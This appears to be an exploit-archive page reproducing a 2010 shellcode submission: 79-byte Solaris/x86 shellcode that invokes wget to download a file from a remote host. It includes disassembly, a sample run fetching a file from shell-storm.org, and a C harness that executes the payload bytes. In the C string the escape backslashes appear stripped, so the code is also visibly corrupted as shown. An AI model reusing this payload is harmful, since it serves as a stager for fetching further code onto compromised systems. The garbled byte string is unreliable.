Solaris/x86 - Remote Download file

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Solaris/x86 - Remote Download file - 79 bytes
# Published : 2010-05-25
# Author : Jonathan Salwan
# Previous Title : Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83
# Next Title : Linux/x86 - Disable randomize stack addresse - 106 bytes
/*
Title:   Solaris/x86 - Remote Download file - 79 bytes 
Author:  Jonathan Salwan <submit [!] shell-storm.org>
Web:     http://www.shell-storm.org
Twitter: http://twitter.com/shell_storm	

!Database of Shellcodes http://www.shell-storm.org/shellcode/

Date:	 2010-05-25
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris


section .text
    0x8048074:              31 d2              xorl   %edx,%edx
    0x8048076:              52                 pushl  %edx
    0x8048077:              6a 73              pushl  $0x73
    0x8048079:              66 68 72 69        pushw  $0x6972
    0x804807d:              68 73 6f 6c 61     pushl  $0x616c6f73
    0x8048082:              68 70 6c 65 2d     pushl  $0x2d656c70
    0x8048087:              68 65 78 65 6d     pushl  $0x6d657865
    0x804808c:              68 6f 72 67 2f     pushl  $0x2f67726f
    0x8048091:              68 6f 72 6d 2e     pushl  $0x2e6d726f
    0x8048096:              68 6c 2d 73 74     pushl  $0x74732d6c
    0x804809b:              68 73 68 65 6c     pushl  $0x6c656873
    0x80480a0:              89 e1              movl   %esp,%ecx
    0x80480a2:              52                 pushl  %edx
    0x80480a3:              6a 74              pushl  $0x74
    0x80480a5:              68 2f 77 67 65     pushl  $0x6567772f
    0x80480aa:              68 2f 62 69 6e     pushl  $0x6e69622f
    0x80480af:              68 2f 75 73 72     pushl  $0x7273752f
    0x80480b4:              89 e3              movl   %esp,%ebx
    0x80480b6:              52                 pushl  %edx
    0x80480b7:              51                 pushl  %ecx
    0x80480b8:              53                 pushl  %ebx
    0x80480b9:              89 e1              movl   %esp,%ecx
    0x80480bb:              52                 pushl  %edx
    0x80480bc:              51                 pushl  %ecx
    0x80480bd:              53                 pushl  %ebx
    0x80480be:              b0 3b              movb   $0x3b,%al
    0x80480c0:              52                 pushl  %edx
    0x80480c1:              cd 91              int    $0x91


Exemple:
--------
 
 jonathan@opensolaris:~/shellcode/wget/C$ ls -l
 total 11
 -rwxr-xr-x 1 jonathan staff 8516 2010-05-25 13:33 remotedl-solaris
 -rw-r--r-- 1 jonathan staff  565 2010-05-25 13:33 remotedl-solaris.c
 jonathan@opensolaris:~/shellcode/wget/C$ ./remotedl-solaris 
 Length: 79
 --13:37:01--  http://shell-storm.org/exemple-solaris
            => `exemple-solaris'
 Resolving shell-storm.org... 82.243.29.135
 Connecting to shell-storm.org|82.243.29.135|:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 15 [text/plain]

 100%[=============================================>] 15            --.--K/s             

 13:37:01 (468.93 KB/s) - `exemple-solaris' saved [15/15]

 jonathan@opensolaris:~/shellcode/wget/C$ cat exemple-solaris 
 Hello Solaris.
 jonathan@opensolaris:~/shellcode/wget/C$

*/

#include <stdio.h>


char sc[] = "x31xd2x52x6ax73x66x68x72x69x68x73x6f"
            "x6cx61x68x70x6cx65x2dx68x65x78x65x6d"
            "x68x6fx72x67x2fx68x6fx72x6dx2ex68x6c"
            "x2dx73x74x68x73x68x65x6cx89xe1x52x6a"
            "x74x68x2fx77x67x65x68x2fx62x69x6ex68"
            "x2fx75x73x72x89xe3x52x51x53x89xe1x52"
            "x51x53xb0x3bx52xcdx91";


int main(void)
{
        fprintf(stdout,"Length: %dn",strlen(sc));
        (*(void(*)()) sc)();

return 0;
}